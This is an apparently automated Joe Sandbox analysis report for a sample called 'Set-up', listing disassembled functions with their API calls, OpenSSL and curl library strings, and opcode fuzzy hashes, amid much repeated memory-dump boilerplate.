Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: 120030de9ac858b0b27865d3c72079dcf8d24a62c49d0ab51822bde200723128
Instruction ID: f87d302fa42f4f3647c8df53d57de569f84207f120435cb6ec6c7de622b199ae
Opcode Fuzzy Hash: 120030de9ac858b0b27865d3c72079dcf8d24a62c49d0ab51822bde200723128
Instruction Fuzzy Hash: C1B10AB1B00A026BE718DB74DC45BA6F7A4BF59315F048329E42C96282FB31B474DBD2

Function 00BBA210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00BBA37F

Strings

QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 00BBA3D5
ossl_quic_channel_raise_protocol_error_loc, xrefs: 00BBA2D9, 00BBA3B0
ssl/quic/quic_channel.c, xrefs: 00BBA2E3, 00BBA3BA
QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 00BBA310

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: 166bc149feb923224acd22691aec4e01cb66bd0695571c376adb8aadaf5b2473
Instruction ID: d4be356be7a85e85a9ab9f8bc999b95a701c500e9006c0194a7f6d18773835b6
Opcode Fuzzy Hash: 166bc149feb923224acd22691aec4e01cb66bd0695571c376adb8aadaf5b2473
Instruction Fuzzy Hash: 5B51D6B1A04349ABCF10DF14DC42EAF7BE5EF88744F044528FE4C97211E631D911ABA2

Function 00DE6250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00B30E3B,?,?,00000000,?), ref: 00DE63E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00B30E3B,?,?,00000000,?), ref: 00DE63FB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 63eb4420e788e64806094d3a47b024da34f042056e9385a93d19859911e10ce4
Instruction ID: 8b7d5a828fb7b8dd720c723ac6946c6e471e6465dcd4a97e248bfccfec44f90d
Opcode Fuzzy Hash: 63eb4420e788e64806094d3a47b024da34f042056e9385a93d19859911e10ce4
Instruction Fuzzy Hash: C441C0B1A083519FD700BF6A9881A2F77E9AFA4794F1D443CF889C7241E675EC0487B2

Function 00C167F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C1691C

Strings

error:%08lX:%s:%s:%s, xrefs: 00C168FE
err:%lx:%lx:%lx:%lx, xrefs: 00C16933
lib(%lu), xrefs: 00C1689A
reason(%lu), xrefs: 00C168E1

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen
String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-804487489
Opcode ID: 926b9faf1bdca9546692a6645b235c4671a1ad3e29b6eccfcd07b935520f8c6b
Instruction ID: 1a20e98eee09d6b413ac2ff47d84a897b4479ac545d768fc2994b67664956294
Opcode Fuzzy Hash: 926b9faf1bdca9546692a6645b235c4671a1ad3e29b6eccfcd07b935520f8c6b
Instruction Fuzzy Hash: BE310BF2A04300ABFB3069569C46BE776DC9B91704F044038FD5C561C2FA76AD94D3A1

Function 00DAA340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00DAABB9), ref: 00DAA34E

Part of subcall function 00C3E270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00C3E28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00DAABB9), ref: 00DAA446

Strings

crypto/conf/conf_def.c, xrefs: 00DAA3B9, 00DAA410
.cnf, xrefs: 00DAA38E
.conf, xrefs: 00DAA376

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: 5124928b079fc037a8a9e8258555d00bd1fbadaafa7a23826432e80f417481c7
Instruction ID: 8fb0c05a11e6e61b811eddc70c111df8a5b3b25dda820766240bcaa376efdc49
Opcode Fuzzy Hash: 5124928b079fc037a8a9e8258555d00bd1fbadaafa7a23826432e80f417481c7
Instruction Fuzzy Hash: C321E6E2E0524167DA107679AC43F2B369C9F57344F080938F8899A2C2F7A5DD14D2B3

Function 00BF0870 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,00C3F556,00000000,FFFFFFFF,00000000,?,00000000,00C406DF,?), ref: 00BF08D7
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,00BB973B), ref: 00BF0977

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

Strings

crypto/buffer/buffer.c, xrefs: 00BF08A1, 00BF08FC, 00BF0911, 00BF0946
BUF_MEM_grow, xrefs: 00BF089A

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memsetstrcpystrlen
String ID: BUF_MEM_grow$crypto/buffer/buffer.c
API String ID: 1298912638-2735992530
Opcode ID: bb5ab7417586814fac859917c5a75a0a8ddf644c46f1c50d8a69fa3d17b56e33
Instruction ID: 8612a27bafb6d2fb961d38e341d543f008db56ee7cf9b76dea5aae6699e821af
Opcode Fuzzy Hash: bb5ab7417586814fac859917c5a75a0a8ddf644c46f1c50d8a69fa3d17b56e33
Instruction Fuzzy Hash: 7A314771B142096BE710BA259C42F3AB3D9DB40714F148228FA58972D3E2B1EC5892E1

Function 00DE66C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DE7850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00DE66E9,?,?,?,?,?,?,?,?,?,?,?), ref: 00DE787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE66F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,010C720C,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DE6776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DE67CC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID:
API String ID: 3909137471-0
Opcode ID: 03df512ed58e913564f516df7fad5b24168ee29e6aa02a4ce1e77046ea5682a3
Instruction ID: 9322376186cb6a18fd838a50e9a408e2873aa0d565e153c931cefc9d5c42c37d
Opcode Fuzzy Hash: 03df512ed58e913564f516df7fad5b24168ee29e6aa02a4ce1e77046ea5682a3
Instruction Fuzzy Hash: 0231C3316002449FCB217FA6DC40A1A77E9EF693B8F580568F9989B211E731DD11CB71

Function 00C42010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00C42704,00000008), ref: 00C4204D

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00C42704,00000008), ref: 00C420C3

Strings

copy_integer, xrefs: 00C420DA
crypto/params.c, xrefs: 00C42090, 00C420E4
general_set_int, xrefs: 00C42086

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 1d7a784db10b0de914aad0fea263a4a24175fa01e95a97403b503751f5a26ffa
Instruction ID: 04de5f0abab97da8e0336ccc5ae629f555d3d70cacf09b5d26c99cc3422bea54
Opcode Fuzzy Hash: 1d7a784db10b0de914aad0fea263a4a24175fa01e95a97403b503751f5a26ffa
Instruction Fuzzy Hash: 3C210D70B083046BD23066259C83F7BB7E5FB85704F640139F95D9B243E5A6ED45E261

Function 00C42140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00C4299E,00000008), ref: 00C421A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00C4299E,00000008), ref: 00C421FE

Part of subcall function 00C440A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C440C1
Part of subcall function 00C440A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C4411E

Strings

copy_integer, xrefs: 00C42214
general_get_uint, xrefs: 00C42176, 00C421BA
crypto/params.c, xrefs: 00C42180, 00C421C4, 00C4221E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: 86f4847643517e4620b095165ac05124e67a1b0fef8b45e601809314e2c67877
Instruction ID: 73132bb6860606dcd0541c853e3d386df29ea697eb6b14e9b34f29ac8c58e9c6
Opcode Fuzzy Hash: 86f4847643517e4620b095165ac05124e67a1b0fef8b45e601809314e2c67877
Instruction Fuzzy Hash: 22218C76B4420077D5303165BC43F6F6757EBC5B24F780139FB0DAA183E9A5AD8171A0

Function 00C42240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00C42BF4,00000008), ref: 00C422C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00C42BF4,00000008), ref: 00C42312

Strings

general_set_uint, xrefs: 00C422D2
copy_integer, xrefs: 00C4228B
crypto/params.c, xrefs: 00C42295, 00C422DC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: ede3b5456b6e9c3c1e4b868a1020f7bb6085a1f44467d58e82bd0bec4574b15e
Instruction ID: 6723c8967b51ad6f85330fe961763f4e109a6765f95f0c01390c47c18e80ea9e
Opcode Fuzzy Hash: ede3b5456b6e9c3c1e4b868a1020f7bb6085a1f44467d58e82bd0bec4574b15e
Instruction Fuzzy Hash: 8A219B70B083002BDB30A925AC43F3A77ADFBD1714F64052DF4598A283E5E9AE801270

Function 00C440A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C440C1

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00C42075,?,?,?,?,?,?,00C42704,00000008), ref: 00C4411E

Strings

copy_integer, xrefs: 00C44134
crypto/params.c, xrefs: 00C440DD, 00C4413E
unsigned_from_signed, xrefs: 00C440D3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
